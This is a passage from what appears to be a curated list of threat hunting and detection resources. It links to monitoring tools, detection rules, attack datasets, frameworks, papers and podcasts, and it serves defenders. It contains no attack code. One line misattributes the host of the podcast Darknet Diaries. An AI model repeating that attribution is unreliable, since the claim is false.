[HELK](https://github.com/Cyb3rWard0g/HELK) - A Hunting ELK (Elasticsearch, Logstash, Kibana) with advanced analytic capabilities. - [DetectionLab](https://github.com/clong/DetectionLab/) - Vagrant & Packer scripts to build a lab environment complete with security tooling and logging best practices. - [Revoke-Obfuscation](https://github.com/danielbohannon/Revoke-Obfuscation) - PowerShell Obfuscation Detection Framework. - [Invoke-ATTACKAPI](https://github.com/Cyb3rWard0g/Invoke-ATTACKAPI) - A PowerShell script to interact with the MITRE ATT&CK Framework via its own API. - [Unfetter](https://github.com/unfetter-analytic/unfetter) - A reference implementation provides a framework for collecting events (process creation, network connections, Window Event Logs, etc.) from a client machine and performing CAR analytics to detect potential adversary activity. - [Flare](https://github.com/austin-taylor/flare) - An analytical framework for network traffic and behavioral analytics. - [RedHunt-OS](https://github.com/redhuntlabs/RedHunt-OS) - A Virtual Machine for Adversary Emulation and Threat Hunting. RedHunt aims to be a one stop shop for all your threat emulation and threat hunting needs by integrating attacker's arsenal as well as defender's toolkit to actively identify the threats in your environment. - [Oriana](https://github.com/mvelazc0/Oriana) - Lateral movement and threat hunting tool for Windows environments built on Django comes Docker ready. - [Bro-Osquery](https://github.com/bro/bro-osquery) - Bro integration with osquery - [Brosquery](https://github.com/jandre/brosquery) - A module for osquery to load Bro logs into tables - [DeepBlueCLI](https://github.com/sans-blue-team/DeepBlueCLI) - A PowerShell Module for Hunt Teaming via Windows Event Logs - [Uncoder](https://uncoder.io) - An online translator for SIEM saved searches, filters, queries, API requests, correlation and Sigma rules - [CimSweep](https://github.com/PowerShellMafia/CimSweep) - A suite of CIM/WMI-based tools that enable the ability to perform incident response and hunting operations remotely across all versions of Windows - [Dispatch](https://github.com/Netflix/dispatch) - An open-source crisis management orchestration framework - [EQL](https://github.com/endgameinc/eql) - Event Query Language - [EQLLib](https://github.com/endgameinc/eqllib) - The Event Query Language Analytics Library (eqllib) is a library of event based analytics, written in EQL to detect adversary behaviors identified in MITRE ATT&CKโ„ข. - [BZAR](https://github.com/mitre-attack/bzar) (Bro/Zeek ATT&CK-based Analytics and Reporting) - A set of Zeek scripts to detect ATT&CK techniques - [Security Onion](https://github.com/Security-Onion-Solutions/security-onion) - An open-source Linux distribution for threat hunting, security monitoring, and log management. It includes ELK, Snort, Suricata, Zeek, Wazuh, Sguil, and many other security tools - [Varna](https://github.com/endgameinc/varna) - A quick & cheap AWS CloudTrail Monitoring with Event Query Language (EQL) - [BinaryAlert](https://github.com/airbnb/binaryalert) - Serverless, real-time & retroactive malware detection - [hollows_hunter](https://github.com/hasherezade/hollows_hunter) - Scans all running processes, recognizes and dumps a variety of potentially malicious implants (replaced/implanted PEs, shellcodes, hooks, in-memory patches). - [ThreatHunting](https://github.com/olafhartong/ThreatHunting) - A Splunk app mapped to MITRE ATT&CK to guide your threat hunts - [Sentinel Attack](https://github.com/BlueTeamLabs/sentinel-attack) - A repository of Azure Sentinel alerts and hunting queries leveraging sysmon and the MITRE ATT&CK framework - [Brim](https://github.com/brimsec/brim) - A desktop application to efficiently search large packet captures and Zeek logs - [YARA](https://github.com/virustotal/yara) - The pattern matching swiss knife - [Intel Owl](https://github.com/intelowlproject/IntelOwl) - An Open Source Intelligence, or OSINT solution to get threat intelligence data about a specific file, an IP or a domain from a single API at scale. - [Capa](https://github.com/fireeye/capa) - An open-source tool to identify capabilities in executable files. - [Splunk Security Content](https://github.com/splunk/security_content) Splunk-curated detection content that can easily be used accross many SIEMs (see Uncoder Rule Converter.) - [Threat Bus](https://github.com/tenzir/threatbus) - Threat intelligence dissemination layer to connect security tools through a distributed publish/subscribe message broker. - [VAST](https://github.com/tenzir/vast) - A network telemetry engine for data-driven security investigations. - [zeek2es](https://github.com/corelight/zeek2es) - An open source tool to convert Zeek logs to Elastic/OpenSearch. You can also output pure JSON from Zeek's TSV logs! - [LogSlash](https://github.com/FoxIO-LLC/LogSlash): A standard for reducing log volume without sacrificing analytical capability. - [SOC-Multitool](https://github.com/zdhenard42/SOC-Multitool): A powerful and user-friendly browser extension that streamlines investigations for security professionals. - [Zeek Analysis Tools (ZAT)](https://github.com/SuperCowPowers/zat): Processing and analysis of Zeek network data with Pandas, scikit-learn, Kafka and Spark. - [ProcMon for Linux](https://github.com/Sysinternals/ProcMon-for-Linux) - [Synthetic Adversarial Log Objects (SALO)](https://github.com/splunk/salo) - A framework for the generation of log events without the need for infrastructure or actions to initiate the event that causes a log event. ### Detection, Alerting and Automation Platforms > Check out the [Detection and Response Pipeline](https://github.com/0x4D31/detection-and-response-pipeline) repository for more resources. The repo contains a compilation of suggested tools/services for each component in a detection and response pipeline, along with real-world examples. The purpose is to create a reference hub for designing effective threat detection and response pipelines. - [ElastAlert](https://github.com/Yelp/elastalert) - A framework for alerting on anomalies, spikes, or other patterns of interest from data in Elasticsearch - [StreamAlert](https://github.com/airbnb/streamalert) - A serverless, realtime data analysis framework which empowers you to ingest, analyze, and alert on data from any environment, using datasources and alerting logic you define - [Matano](https://github.com/matanolabs/matano): An open source security lake platform (SIEM alternative) for threat hunting, detection and response on AWS. Matano lets you write advanced detections as code (using python) to correlate and alert on threats in realtime. - [Shuffle](https://github.com/Shuffle/Shuffle): A general purpose security automation platform. - [Sublime](https://github.com/sublime-security/sublime-platform): An open platform for detection, response, and threat hunting in email environments. Sublime lets you write advanced detections as code to alert and remediate threats like phishing in real-time. - [Substation](https://github.com/brexhq/substation) - A cloud native data pipeline and transformation toolkit for security teams. ### Endpoint Monitoring - [osquery](https://osquery.io) ([github](https://github.com/osquery/osquery)) - SQL powered operating system instrumentation, monitoring, and analytics - [Kolide Fleet](https://github.com/kolide/fleet) - A flexible control server for osquery fleets - [Zeek Agent](https://github.com/zeek/zeek-agent) - An endpoint monitoring agent that provides host activity to Zeek - [Velociraptor](https://github.com/Velocidex/velociraptor) - Endpoint visibility and collection tool - [Sysdig](https://github.com/draios/sysdig) - A tool for deep Linux system visibility, with native support for containers. Think about sysdig as strace + tcpdump + htop + iftop + lsof + ...awesome sauce - [go-audit](https://github.com/slackhq/go-audit) - An alternative to the Linux auditd daemon - [Sysmon](https://docs.microsoft.com/en-us/sysinternals/downloads/sysmon) - A Windows system service and device driver that monitors and logs system activity to the Windows event log - [Sysmon for Linux](https://github.com/Sysinternals/SysmonForLinux) - [OSSEC](https://github.com/ossec/ossec-hids) - An open-source Host-based Intrusion Detection System (HIDS) - [WAZUH](https://github.com/wazuh/wazuh) - An open-source security platform #### Configuration - [sysmon-DFIR](https://github.com/MHaggis/sysmon-dfir) - Sources, configuration and how to detect evil things utilizing Microsoft Sysmon. - [sysmon-config](https://github.com/SwiftOnSecurity/sysmon-config) - Sysmon configuration file template with default high-quality event tracing. - [sysmon-modular](https://github.com/olafhartong/sysmon-modular) - A repository of sysmon configuration modules. It also includes a [mapping](https://github.com/olafhartong/sysmon-modular/blob/master/attack_matrix/README.md) of Sysmon configurations to MITRE ATT&CK techniques. - [auditd configuration](https://github.com/Neo23x0/auditd) - [osquery-configuration](https://github.com/palantir/osquery-configuration) - A repository for using osquery for incident detection and response. ### Network Monitoring - [Zeek](https://github.com/zeek/zeek) (formerly Bro) - A network security monitoring tool - [ntopng](https://github.com/ntop/ntopng) - A web-based network traffic monitoring tool - [Suricata](https://suricata-ids.org) - A network threat detection engine - [Snort](https://snort.org) ([github](https://github.com/snort3/snort3)) - A network intrusion detection tool - [Joy](https://github.com/cisco/joy) - A package for capturing and analyzing network flow data and intraflow data, for network research, forensics, and security monitoring - [Netcap](https://github.com/dreadl0ck/netcap) - A framework for secure and scalable network traffic analysis - [Moloch](https://github.com/aol/moloch) - A large scale and open source full packet capture and search tool - [Stenographer](https://github.com/google/stenographer) - A full-packet-capture tool #### Fingerprinting Tools - [JA3](https://github.com/salesforce/ja3) - A method for profiling SSL/TLS Clients and Servers - [HASSH](https://github.com/salesforce/hassh) - Profiling Method for SSH Clients and Servers - [RDFP](https://github.com/yahoo/rdfp) - Zeek Remote desktop fingerprinting script based on [FATT](https://github.com/0x4D31/fatt) (Fingerprint All The Things) - [FATT](https://github.com/0x4D31/fatt) - A pyshark based script for extracting network metadata and fingerprints from pcap files and live network traffic - [FingerprinTLS](https://github.com/LeeBrotherston/tls-fingerprinting) - A TLS fingerprinting method - [Mercury](https://github.com/cisco/mercury) - Network fingerprinting and packet metadata capture - [GQUIC Protocol Analyzer for Zeek](https://github.com/salesforce/GQUIC_Protocol_Analyzer) - [Recog](https://github.com/rapid7/recog) - A framework for identifying products, services, operating systems, and hardware by matching fingerprints against data returned from various network probes - [Hfinger](https://github.com/CERT-Polska/hfinger) - Fingerprinting HTTP requests - [JARM](https://github.com/salesforce/jarm) - An active Transport Layer Security (TLS) server fingerprinting tool. ### Email Monitoring - [Sublime Platform](https://github.com/sublime-security/sublime-platform) - An email threat detection engine ## Detection Rules - [Sigma](https://github.com/SigmaHQ/sigma) - Generic Signature Format for SIEM Systems - [Splunk Detections](https://research.splunk.com/detections/) and [Analytic stories](https://research.splunk.com/stories/) - [Elastic Detection Rules](https://github.com/elastic/detection-rules) - [MITRE CAR](https://car.mitre.org/) - The Cyber Analytics Repository is a knowledge base of analytics developed by MITRE based on the Adversary Tactics, Techniques, and Common Knowledge (ATT&CKโ„ข) adversary model. - [Awesome YARA Rules](https://github.com/InQuest/awesome-yara#rules) - [Chronicle Detection Rules](https://github.com/chronicle/detection-rules) - Collection of YARA-L 2.0 sample rules for the Chronicle Detection API. - [GCP Security Analytics](https://github.com/GoogleCloudPlatform/security-analytics) - Community Security Analytics provides a set of community-driven audit & threat queries for Google Cloud. - [ThreatHunter-Playbook](https://github.com/OTRF/ThreatHunter-Playbook) - A community-driven, open-source project to share detection logic, adversary tradecraft and resources to make detection development more efficient. - [Sublime Detection Rules](https://github.com/sublime-security/sublime-rules) - Email attack detection, response, and hunting rules. ## Dataset - [Mordor](https://github.com/Cyb3rWard0g/mordor) - Pre-recorded security events generated by simulated adversarial techniques in the form of JavaScript Object Notation (JSON) files. The data is categorized by platforms, adversary groups, tactics and techniques defined by the Mitre ATT&CK Framework. - [SecRepo.com](https://www.secrepo.com)([github repo](https://github.com/sooshie/secrepo)) - Samples of security related data. - [Boss of the SOC (BOTS) Dataset Version 1](https://github.com/splunk/botsv1) - [Boss of the SOC (BOTS) Dataset Version 2](https://github.com/splunk/botsv2) - [Boss of the SOC (BOTS) Dataset Version 3](https://github.com/splunk/botsv3) - [EMBER](https://github.com/endgameinc/ember) ([paper](https://arxiv.org/abs/1804.04637)) - The EMBER dataset is a collection of features from PE files that serve as a benchmark dataset for researchers - [theZoo](https://github.com/ytisf/theZoo) - A repository of LIVE malwares - [CIC Datasets](https://www.unb.ca/cic/datasets/index.html) - Canadian Institute for Cybersecurity datasets - [Netresec's PCAP repo list](https://www.netresec.com/?page=PcapFiles) - A list of public packet capture repositories, which are freely available on the Internet. - [PCAP-ATTACK](https://github.com/sbousseaden/PCAP-ATTACK) - A repo of PCAP samples for different ATT&CK techniques. - [EVTX-ATTACK-SAMPLES](https://github.com/sbousseaden/EVTX-ATTACK-SAMPLES) - A repo of Windows event samples (EVTX) associated with ATT&CK techniques ([EVTX-ATT&CK Sheet](https://docs.google.com/spreadsheets/d/12V5T9j6Fi3JSmMpAsMwovnWqRFKzzI9l2iXS5dEsnrs/edit#gid=164587082)). - [Public Security Log Sharing Site](http://log-sharing.dreamhosters.com) - [attack_data](https://github.com/splunk/attack_data) - A repository of curated datasets from various attacks. ## Resources - [Huntpedia](docs/huntpedia.pdf) - Your Threat Hunting Knowledge Compendium - [Hunt Evil](docs/hunt-evil.pdf) - Your Practical Guide to Threat Hunting - [The Hunter's Handbook](docs/The-Hunters-Handbook.pdf) - Endgame's guide to adversary hunting - [ThreatHunter-Playbook](https://github.com/Cyb3rWard0g/ThreatHunter-Playbook) - A Threat hunter's playbook to aid the development of techniques and hypothesis for hunting campaigns. - [The ThreatHunting Project](https://github.com/ThreatHuntingProject/ThreatHunting) - A great [collection of hunts](https://github.com/ThreatHuntingProject/ThreatHunting/tree/master/hunts) and threat hunting resources. - [CyberThreatHunting](https://github.com/A3sal0n/CyberThreatHunting) - A collection of resources for threat hunters. - [Hunt-Detect-Prevent](https://github.com/MHaggis/hunt-detect-prevent) - Lists of sources and utilities to hunt, detect and prevent evildoers. - [Alerting and Detection Strategy Framework](https://medium.com/@palantir/alerting-and-detection-strategy-framework-52dc33722df2) - [Generating Hypotheses for Successful Threat Hunting](https://www.sans.org/reading-room/whitepapers/threats/generating-hypotheses-successful-threat-hunting-37172) - [Expert Investigation Guide - Threat Hunting](https://github.com/Foundstone/ExpertInvestigationGuides/tree/master/ThreatHunting) - [Active Directory Threat Hunting](https://adsecurity.org/wp-content/uploads/2017/04/2017-BSidesCharm-DetectingtheElusive-ActiveDirectoryThreatHunting-Final.pdf) - [Threat Hunting for Fileless Malware](https://www.countercept.com/our-thinking/threat-hunting-for-fileless-malware/) - [Windows Commands Abused by Attackers](http://blog.jpcert.or.jp/.s/2016/01/windows-commands-abused-by-attackers.html) - [Deception-as-Detection](https://github.com/0x4D31/deception-as-detection) - Deception based detection techniques mapped to the MITREโ€™s ATT&CK framework. - [On TTPs](http://ryanstillions.blogspot.com.au/2014/04/on-ttps.html) - Hunting On The Cheap ([Slides](https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1492182404.pdf)) - [Threat Hunting Techniques - AV, Proxy, DNS and HTTP Logs](https://www.cyberhuntz.com/2016/08/threat-hunting-techniques-av-proxy-dns.html) - [Detecting Malware Beacons Using Splunk](https://pleasefeedthegeek.wordpress.com/2012/12/20/detecting-malware-beacons-using-splunk/) - [Data Science Hunting Funnel](http://www.austintaylor.io/network/traffic/threat/data/science/hunting/funnel/machine/learning/domain/expertise/2017/07/11/data-science-hunting-funnel/) - [Use Python & Pandas to Create a D3 Force Directed Network Diagram](http://www.austintaylor.io/d3/python/pandas/2016/02/01/create-d3-chart-python-force-directed/) - [Syscall Auditing at Scale](https://slack.engineering/syscall-auditing-at-scale-e6a3ca8ac1b8) - [Catching attackers with go-audit and a logging pipeline](https://summitroute.com/blog/2016/12/25/Catching_attackers_with_go-audit_and_a_logging_pipeline/) - [The Coventry Conundrum of Threat Intelligence](https://summitroute.com/blog/2015/06/10/the_conventry_conundrum_of_threat_intelligence/) - [Signal the ATT&CK: Part 1](https://www.pwc.co.uk/issues/cyber-security-data-privacy/research/signal-att-and-ck-part-1.html) - Building a real-time threat detection capability with Tanium that focuses on documented adversarial techniques. - SANS Summit Archives ([DFIR](https://www.sans.org/cyber-security-summit/archives/dfir), [Cyber Defense](https://www.sans.org/cyber-security-summit/archives/cyber-defense)) - Threat hunting, Blue Team and DFIR summit slides - [Bro-Osquery](https://svs.informatik.uni-hamburg.de/publications/2018/2018-05-31-Haas-QueryCon-Bro-Osquery.pdf) - Large-Scale Host and Network Monitoring Using Open-Source Software - [Malware Persistence](https://github.com/Karneades/malware-persistence) - Collection of various information focused on malware persistence: detection (techniques), response, pitfalls and the log collection (tools). - [Threat Hunting with Jupyter Notebooks](https://posts.specterops.io/threat-hunting-with-jupyter-notebooks-part-1-your-first-notebook-9a99a781fde7) - [How Dropbox Security builds tools for threat detection and incident response](https://dropbox.tech/security/how-dropbox-security-builds-better-tools-for-threat-detection-and-incident-response) - [Introducing Event Query Language](https://www.elastic.co/blog/introducing-event-query-language) - [The No Hassle Guide to Event Query Language (EQL) for Threat Hunting](https://www.varonis.com/blog/guide-no-hassle-eql-threat-hunting/) ([PDF](docs/varonis.com-EQLforThreatHunting.pdf)) - [Introducing the Funnel of Fidelity](https://posts.specterops.io/introducing-the-funnel-of-fidelity-b1bb59b04036) ([PDF](docs/specterops-IntroducingtheFunnelofFidelity.pdf)) - [Detection Spectrum](https://posts.specterops.io/detection-spectrum-198a0bfb9302) ([PDF](docs/specterops-DetectionSpectrum.pdf)) - [Capability Abstraction](https://posts.specterops.io/capability-abstraction-fbeaeeb26384) ([PDF](docs/specterops-CapabilityAbstraction.pdf)) - [Awesome YARA](https://github.com/InQuest/awesome-yara) - A curated list of awesome YARA rules, tools, and resources - [Defining ATT&CK Data Sources](https://medium.com/mitre-attack/defining-attack-data-sources-part-i-4c39e581454f) - A two-part blog series that outlines a new methodology to extend ATT&CKโ€™s current data sources. - [DETT&CT: MAPPING YOUR BLUE TEAM TO MITRE ATT&CKโ„ข](https://www.mbsecure.nl/blog/2019/5/dettact-mapping-your-blue-team-to-mitre-attack) - A blog that describes how to align MITRE ATT&CK-based detection content with data sources. - Detection as Code in Splunk [Part 1, ](https://www.splunk.com/en_us/blog/security/ci-cd-detection-engineering-splunk-security-content-part-1.html)[Part 2, ](https://www.splunk.com/en_us/blog/security/ci-cd-detection-engineering-splunk-s-attack-range-part-2.html)[and Part 3](https://www.splunk.com/en_us/blog/security/ci-cd-detection-engineering-failing-part-3.html) - A multipart series describing how detection as code can be successfully deployed in a Splunk environment. - [Lessons Learned in Detection Engineering](https://medium.com/starting-up-security/lessons-learned-in-detection-engineering-304aec709856) - A well experienced detection engineer describes in detail his observations, challenges, and recommendations for building an effective threat detection program. - [A Research-Driven process applied to Threat Detection Engineering Inputs](https://ateixei.medium.com/a-research-driven-process-applied-to-threat-detection-engineering-inputs-1b7e6fe0412b). - [Investigation Scenario](https://twitter.com/search?q=%23InvestigationPath%20from%3Achrissanders88&f=live) tweets by Chris Sanders - [Oh My Malware](https://ohmymalware.com) - A video series focused on malware execution and investigations using Elastic Security. ### Frameworks - [MITRE ATT&CK](https://attack.mitre.org/wiki/Main_Page) - A curated knowledge base and model for cyber adversary behavior, reflecting the various phases of an adversaryโ€™s lifecycle and the platforms they are known to target. - [Alerting and Detection Strategies Framework](https://github.com/palantir/alerting-detection-strategy-framework) - A framework for developing alerting and detection strategies. - [A Simple Hunting Maturity Model](http://detect-respond.blogspot.com.au/2015/10/a-simple-hunting-maturity-model.html) - The Hunting Maturity Model describes five levels of organizational hunting capability, ranging from HMM0 (the least capability) to HMM4 (the most). - [The Pyramic of Pain](http://detect-respond.blogspot.com.au/2013/03/the-pyramid-of-pain.html) - The relationship between the types of indicators you might use to detect an adversary's activities and how much pain it will cause them when you are able to deny those indicators to them. - [A Framework for Cyber Threat Hunting](docs/Framework-for-Threat-Hunting-Whitepaper.pdf) - [The PARIS Model](http://threathunter.guru/blog/the-paris-model/) - A model for threat hunting. - [Cyber Kill Chain](https://www.lockheedmartin.com/us/what-we-do/aerospace-defense/cyber/cyber-kill-chain.html) - It is part of the Intelligence Driven Defenseยฎ model for identification and prevention of cyber intrusions activity. The model identifies what the adversaries must complete in order to achieve their objective. - [The DML Model](http://ryanstillions.blogspot.com.au/2014/04/the-dml-model_21.html) - The Detection Maturity Level (DML) model is a capability maturity model for referencing ones maturity in detecting cyber attacks. - [NIST Cybersecurity Framework](https://www.nist.gov/cyberframework) - [OSSEM](https://github.com/hunters-forge/OSSEM) (Open Source Security Events Metadata) - A community-led project that focuses on the documentation and standardization of security event logs from diverse data sources and operating systems. - [Open Cybersecurity Schema Framework (OCSF)](https://github.com/ocsf/ocsf-schema) - A framework for creating schemas and it also delivers a cybersecurity event schema built with the framework ([schema browser](https://schema.ocsf.io/)). - [MITRE Engage](https://engage.mitre.org/) - A framework for planning and discussing adversary engagement operations that empowers you to engage your adversaries and achieve your cybersecurity goals. - [MaGMa Use Case Defintion Model](https://www.betaalvereniging.nl/wp-content/uploads/FI-ISAC-use-case-framework-verkorte-versie.pdf) - A business-centric approach for planning and defining threat detection use cases. ### Windows - [Threat Hunting via Windows Event Logs](docs/Threat%20Hunting%20via%20Windows%20Event%20Logs%20Secwest%202019.pdf) - [Windows Logging Cheat Sheets](https://www.malwarearchaeology.com/cheat-sheets/) - [Active Directory Threat Hunting](https://adsecurity.org/wp-content/uploads/2017/04/2017-BSidesCharm-DetectingtheElusive-ActiveDirectoryThreatHunting-Final.pdf) - [Windows Hunting](https://github.com/beahunt3r/Windows-Hunting) - A collection of Windows hunting queries - [Windows Commands Abused by Attackers](https://blogs.jpcert.or.jp/en/2016/01/windows-commands-abused-by-attackers.html) - [JPCERT - Detecting Lateral Movement through Tracking Event Logs](https://blogs.jpcert.or.jp/en/2017/12/research-report-released-detecting-lateral-movement-through-tracking-event-logs-version-2.html) - [Tool Analysis Result Sheet](https://jpcertcc.github.io/ToolAnalysisResultSheet/) #### Sysmon - [Splunking the Endpoint: Threat Hunting with Sysmon](https://medium.com/@haggis_m/splunking-the-endpoint-threat-hunting-with-sysmon-9dd956e3e1bd) - [Hunting with Sysmon](https://medium.com/@haggis_m/hunting-with-sysmon-38de012e62e6) - [Threat Hunting with Sysmon: Word Document with Macro](http://www.syspanda.com/index.php/2017/10/10/threat-hunting-sysmon-word-document-macro/) - Chronicles of a Threat Hunter: Hunting for In-Memory Mimikatz with Sysmon and ELK - [Part I (Event ID 7)](https://cyberwardog.blogspot.com.au/2017/03/chronicles-of-threat-hunter-hunting-for.html) - [Part II (Event ID 10)](https://cyberwardog.blogspot.com.au/2017/03/chronicles-of-threat-hunter-hunting-for_22.html) - Advanced Incident Detection and Threat Hunting using Sysmon (and Splunk) ([botconf 2016 Slides](https://www.botconf.eu/wp-content/uploads/2016/11/PR12-Sysmon-UELTSCHI.pdf), [FIRST 2017 Slides](https://www.first.org/resources/papers/conf2017/Advanced-Incident-Detection-and-Threat-Hunting-using-Sysmon-and-Splunk.pdf)) - [The Sysmon and Threat Hunting Mimikatz wiki for the blue team](https://www.peerlyst.com/posts/the-sysmon-and-threat-hunting-mimikatz-wiki-for-the-blue-team-guurhart) - [Splunkmon โ€” Taking Sysmon to the Next Level](https://www.crypsisgroup.com/wp-content/uploads/2017/07/CG_WhitePaper_Splunkmon_1216-1.pdf) - [Sysmon Threat Detection Guide](https://www.varonis.com/blog/sysmon-threat-detection-guide/) ([PDF](docs/varonis.com-SysmonThreatAnalysisGuide.pdf)) #### PowerShell - Revoke-Obfuscation: PowerShell Obfuscation Detection Using Science ([Paper](https://www.blackhat.com/docs/us-17/thursday/us-17-Bohannon-Revoke-Obfuscation-PowerShell-Obfuscation-Detection-And%20Evasion-Using-Science-wp.pdf), [Slides](https://www.blackhat.com/docs/us-17/thursday/us-17-Bohannon-Revoke-Obfuscation-PowerShell-Obfuscation-Detection-And%20Evasion-Using-Science.pdf)) - [Hunting the Known Unknowns (With PowerShell)](https://conf.splunk.com/files/2016/slides/hunting-the-known-unknowns-the-powershell-edition.pdf) - [HellsBells, Let's Hunt PowerShells!](https://www.splunk.com/blog/2017/07/06/hellsbells-lets-hunt-powershells.html) - [Hunting for PowerShell Using Heatmaps](https://medium.com/@jshlbrd/hunting-for-powershell-using-heatmaps-69b70151fa5d) ### MacOS - [A Guide to macOS Threat Hunting and Incident Response](docs/SentinalOne_macOS_Threat_Hunting_and_Incident_Response_A_Complete_Guide_17032020-1.pdf) ### Osquery - [osquery Across the Enterprise](https://medium.com/@palantir/osquery-across-the-enterprise-3c3c9d13ec55) - [osquery for Security โ€” Part 1](https://medium.com/@clong/osquery-for-security-b66fffdf2daf) - [osquery for Securityโ€Šโ€”โ€ŠPart 2](https://medium.com/@clong/osquery-for-security-part-2-2e03de4d3721) - Advanced osquery functionality, File integrity monitoring, process auditing, and more. - [Tracking a stolen code-signing certificate with osquery](https://blog.trailofbits.com/2017/10/10/tracking-a-stolen-code-signing-certificate-with-osquery/) - [Monitoring macOS hosts with osquery](https://blog.kolide.com/monitoring-macos-hosts-with-osquery-ba5dcc83122d) - [Kolide's Blog](https://blog.kolide.com/) - [The osquery Extensions Skunkworks Project](https://github.com/trailofbits/presentations/tree/master/Osquery%20Extensions) ### DNS - [Detecting DNS Tunneling](https://www.sans.org/reading-room/whitepapers/dns/detecting-dns-tunneling-34152) - [Hunting the Known Unknowns (with DNS)](https://www.splunk.com/pdfs/events/govsummit/hunting_the_known_unknowns_with_DNS.pdf) - [Detecting dynamic DNS domains in Splunk](https://www.splunk.com/blog/2015/08/04/detecting-dynamic-dns-domains-in-splunk.html) - [Random Words on Entropy and DNS](https://www.splunk.com/blog/2015/10/01/random-words-on-entropy-and-dns.html) - [Tracking Newly Registered Domains](https://isc.sans.edu/diary/Tracking+Newly+Registered+Domains/23127) - [Suspicious Domains Tracking Dashboard](https://isc.sans.edu/forums/diary/Suspicious+Domains+Tracking+Dashboard/23046/) - [Proactive Malicious Domain Search](https://isc.sans.edu/forums/diary/Proactive+Malicious+Domain+Search/23065/) - [DNS is NOT Boring](https://www.first.org/resources/papers/conf2017/DNS-is-NOT-Boring-Using-DNS-to-Expose-and-Thwart-Attacks.pdf) - Using DNS to Expose and Thwart Attacks - [Actionable Detects](https://prezi.com/vejpnxkm85ih/actionable-detects-dns-keynote/) - Blue Team Tactics ### Fingerprinting - [JA3: SSL/TLS Client Fingerprinting for Malware Detection](https://engineering.salesforce.com/open-sourcing-ja3-92c9e53c3c41) - [TLS Fingerprinting with JA3 and JA3S](https://engineering.salesforce.com/tls-fingerprinting-with-ja3-and-ja3s-247362855967) - [HASSH - a profiling method for SSH Clients and Servers](https://engineering.salesforce.com/open-sourcing-hassh-abed3ae5044c) - [HASSH @BSides Canberra 2019 - Slides](https://github.com/benjeems/Presentations/blob/master/BSides%202019%20%20-%20HASSH%20-%20a%20Profiling%20Method%20for%20SSH%20Clients%20and%20Servers.pdf) - [Finding Evil on the Network Using JA3/S and HASSH](https://engineering.salesforce.com/finding-evil-on-the-network-using-ja3-s-and-hassh-11431a8606e4) - [RDP Fingerprinting - Profiling RDP Clients with JA3 and RDFP](https://medium.com/@0x4d31/rdp-client-fingerprinting-9e7ac219f7f4) - [Effective TLS Fingerprinting Beyond JA3](https://www.ntop.org/ndpi/effective-tls-fingerprinting-beyond-ja3/) - [TLS Fingerprinting in the Real World](https://blogs.cisco.com/security/tls-fingerprinting-in-the-real-world) - [HTTP Client Fingerprinting Using SSL Handshake Analysis](https://www.ssllabs.com/projects/client-fingerprinting/) (source code: [mod_sslhaf](https://github.com/ssllabs/sslhaf) - [TLS fingerprinting - Smarter Defending & Stealthier Attacking](https://blog.squarelemon.com/tls-fingerprinting/) - [JA3er](https://ja3er.com) - a DB of JA3 fingerprints - [An Introduction to HTTP fingerprinting](https://www.net-square.com/httprint_paper.html) - [TLS Fingerprints](https://tlsfingerprint.io/) collected from the University of Colorado Boulder campus network - [The use of TLS in Censorship Circumvention](https://tlsfingerprint.io/static/frolov2019.pdf) - [TLS Beyond the Browser: Combining End Host and Network Data to Understand Application Behavior](https://dl.acm.org/doi/pdf/10.1145/3355369.3355601) - [HTTPS traffic analysis and client identification using passive SSL/TLS fingerprinting](https://link.springer.com/article/10.1186/s13635-016-0030-7) - [Markov Chain Fingerprinting to Classify Encrypted Traffic](https://drakkar.imag.fr/IMG/pdf/1569811033.pdf) - [HeadPrint: Detecting Anomalous Communications through Header-based Application Fingerprinting](https://www.conand.me/publications/bortolameotti-headprint-2020.pdf) ### Data Science - [data_hacking](https://github.com/SuperCowPowers/data_hacking) - Examples of using IPython, Pandas, and Scikit Learn to get the most out of your security data. - [Reverse engineering the analyst: building machine learning models for the SOC](https://www.mandiant.com/resources/blog/build-machine-learning-models-for-the-soc) - [msticpy](https://github.com/microsoft/msticpy) - A library for InfoSec investigation and hunting in Jupyter Notebooks. ### Research Papers - [Intelligence-Driven Computer Network Defense Informed by Analysis of Adversary Campaigns and Intrusion Kill Chains](https://www.lockheedmartin.com/content/dam/lockheed/data/corporate/documents/LM-White-Paper-Intel-Driven-Defense.pdf) - [The Diamond Model of Intrusion Analysis](http://www.activeresponse.org/wp-content/uploads/2013/07/diamond.pdf) - [EXPOSURE: Finding Malicious Domains Using Passive DNS Analysis](https://www.cs.ucsb.edu/~chris/research/doc/ndss11_exposure.pdf) - A Comprehensive Approach to Intrusion Detection Alert Correlation ([Paper](https://www.cs.ucsb.edu/~vigna/publications/2004_valeur_vigna_kruegel_kemmerer_TDSC_Correlation.pdf), [Dissertation](http://citeseerx.ist.psu.edu/viewdoc/download?doi=10.1.1.115.8310&rep=rep1&type=pdf)) - [On Botnets that use DNS for Command and Control](http://www.few.vu.nl/~herbertb/papers/feederbot_ec2nd11.pdf) - [Intelligent, Automated Red Team Emulation](https://dl.acm.org/citation.cfm?id=2991111) - [Machine Learning for Encrypted Malware Traffic Classification](https://dl.acm.org/doi/pdf/10.1145/3097983.3098163) ### Blogs - [David Bianco's Blog](https://detect-respond.blogspot.com) - [DFIR and Threat Hunting Blog](http://findingbad.blogspot.com) - [CyberWardog's Blog](https://medium.com/@Cyb3rWard0g) ([old](https://cyberwardog.blogspot.com)) - [Chris Sanders' Blog](https://chrissanders.org) - [Kolide Blog](https://blog.kolide.com/) - [Anton Chuvakin](https://medium.com/anton-on-security) - [Alexandre Teixeira](https://ateixei.medium.com) ### Related Awesome Lists - [Awesome Kubernetes Threat Detection](https://github.com/jatrost/awesome-kubernetes-threat-detection) - [Awesome Incident Response](https://github.com/meirwah/awesome-incident-response) - [Awesome Forensics](https://github.com/cugu/awesome-forensics) - [Awesome Honeypots](https://github.com/paralax/awesome-honeypots) - [Awesome Malware Analysis](https://github.com/rshipp/awesome-malware-analysis) - [Awesome YARA](https://github.com/InQuest/awesome-yara) - [Awesome Security](https://github.com/sbilly/awesome-security) - [Awesome Cloud Security](https://github.com/4ndersonLin/awesome-cloud-security) ## Podcasts - Google [Cloud Security Podcast](https://cloud.withgoogle.com/cloudsecurity/podcast/) by Anton Chuvakin and Timothy Peacock. - [Detection: Challenging Paradigms](https://www.dcppodcast.com/all-episodes) by SpecterOps - [Darknet Diaries](https://darknetdiaries.com) by Andy Greenberg - True stories from the dark side of the Internet. - [Risky Business](https://risky.biz) by Patrick Gray ## Newsletters - [Detection Engineering Weekly](https://www.detectionengineering.net) by Zack 'techy' Allen - [This Week in 